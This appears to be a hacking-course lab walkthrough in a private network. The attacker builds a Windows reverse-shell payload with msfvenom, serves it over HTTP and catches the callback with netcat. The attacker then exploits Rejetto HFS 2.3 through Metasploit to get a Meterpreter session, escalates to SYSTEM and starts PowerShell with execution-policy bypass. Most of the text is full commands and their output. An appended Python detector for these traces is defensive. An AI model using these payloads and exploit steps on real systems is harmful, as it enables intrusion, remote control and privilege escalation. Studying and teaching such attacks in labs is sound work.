
Metasploit Framework

msfvenom (tool for generating payloads)

Attacker

┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.230.128 LPORT=8787 -f exe -o virus.exe
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Victim

C:\Users\Red>curl http://192.168.230.128:80/virus.exe > virus.exe

Attacker

┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ netcat -lvnp 8787
listening on [any] 8787 ...

Victim

C:\Users\Red>virus.exe

Attacker

┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ netcat -lvnp 8787
listening on [any] 8787 ...
connect to [192.168.230.128] from (UNKNOWN) [192.168.230.129] 50152
Microsoft Windows [Version 10.0.22621.4169]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Red>shutdown /r /t 0
shutdown /r /t 0

msfconsole (tool for launching exploits)

Attacker

┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ nmap -sV -sC 192.168.230.129 
PORT     STATE SERVICE       VERSION
...
8080/tcp open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
...

Look up online whether HFS 2.3 has any known vulnerability.


┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ msfconsole 
...
msf6 > search HFS 2.3
Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   ...
   4  exploit/windows/http/rejetto_hfs_exec                2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution
   ...

msf6 > info exploit/windows/http/rejetto_hfs_exec

Decide to use the exploit/windows/http/rejetto_hfs_exec module.

msf6 > use exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.230.129  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                         /using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                          local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.230.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.230.129
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.230.128:4444 
[*] Using URL: http://192.168.230.128:8080/kwasbp
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /kwasbp
[*] Sending stage (176198 bytes) to 192.168.230.129
[!] Tried to delete %TEMP%\yuqCgIpSBxjZnA.vbs, unknown result
[*] Meterpreter session 1 opened (192.168.230.128:4444 -> 192.168.230.129:49868) at 2024-09-20 23:29:21 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer        : NTUST-HACKING-1
OS              : Windows 11 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NTUST-HACKING-1\Red
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4552 created.
Channel 2 created.
Microsoft Windows [Version 10.0.22621.4169]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Red\Desktop\hfs2.3_288>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\Red\Desktop\hfs2.3_288>
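An added example from the defender's side (not part of the original note, and not Metasploit's or HFS's code): a small Python detector that scans constructed Sysmon-style event lines for the traces both labs above leave on the victim, the reverse-shell callback to LPORT 8787 from the msfvenom section, the .vbs written to %TEMP% and the shell spawned by the web server process from the HFS exploit, and the `powershell -ep bypass` at the end. The event format, field names, file paths and the parent-process chain (hfs.exe spawning cmd.exe) are assumptions.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network
# connect, 11 = file create) mirroring the lab: attacker 192.168.230.128,
# victim 192.168.230.129. Paths, parent processes and 203.0.113.5 are made up.
SAMPLE_EVENTS = [
    "EventID=3 Image=C:\\Users\\Red\\virus.exe DestinationIp=192.168.230.128 DestinationPort=8787",
    "EventID=3 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe DestinationIp=203.0.113.5 DestinationPort=443",
    "EventID=11 Image=C:\\Users\\Red\\Desktop\\hfs2.3_288\\hfs.exe TargetFilename=C:\\Users\\Red\\AppData\\Local\\Temp\\yuqCgIpSBxjZnA.vbs",
    "EventID=1 Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Users\\Red\\Desktop\\hfs2.3_288\\hfs.exe CommandLine=cmd.exe",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=powershell -ep bypass",
]

FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")   # Key=Value pairs; values may contain spaces
COMMON_PORTS = {53, 80, 443}
WEB_SERVERS = ("hfs.exe", "httpd.exe", "nginx.exe", "w3wp.exe")
SHELLS = ("cmd.exe", "powershell.exe")
EP_BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.IGNORECASE)

def parse_event(line):
    return dict(FIELD_RE.findall(line))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of every rule a single event triggers."""
    hits = []
    eid = event.get("EventID")
    if eid == "3":
        # Binary under a user profile calling out on an uncommon port (virus.exe -> LPORT 8787)
        port = int(event.get("DestinationPort", "0"))
        if port not in COMMON_PORTS and event.get("Image", "").lower().startswith("c:\\users\\"):
            hits.append("uncommon-port-callback")
    elif eid == "11":
        # Script or executable written under a Temp directory (the exploit's .vbs)
        target = event.get("TargetFilename", "").lower()
        if "\\temp\\" in target and target.endswith((".vbs", ".ps1", ".bat", ".exe")):
            hits.append("script-dropped-in-temp")
    elif eid == "1":
        # A web server process spawning a shell, or PowerShell started with -ep bypass
        if basename(event.get("ParentImage", "")) in WEB_SERVERS and basename(event.get("Image", "")) in SHELLS:
            hits.append("web-server-spawned-shell")
        if EP_BYPASS_RE.search(event.get("CommandLine", "")):
            hits.append("powershell-ep-bypass")
    return hits

def detect(lines):
    """Scan all events in order; return [(rule, event_index), ...]."""
    return [(rule, i) for i, line in enumerate(lines) for rule in classify(parse_event(line))]
```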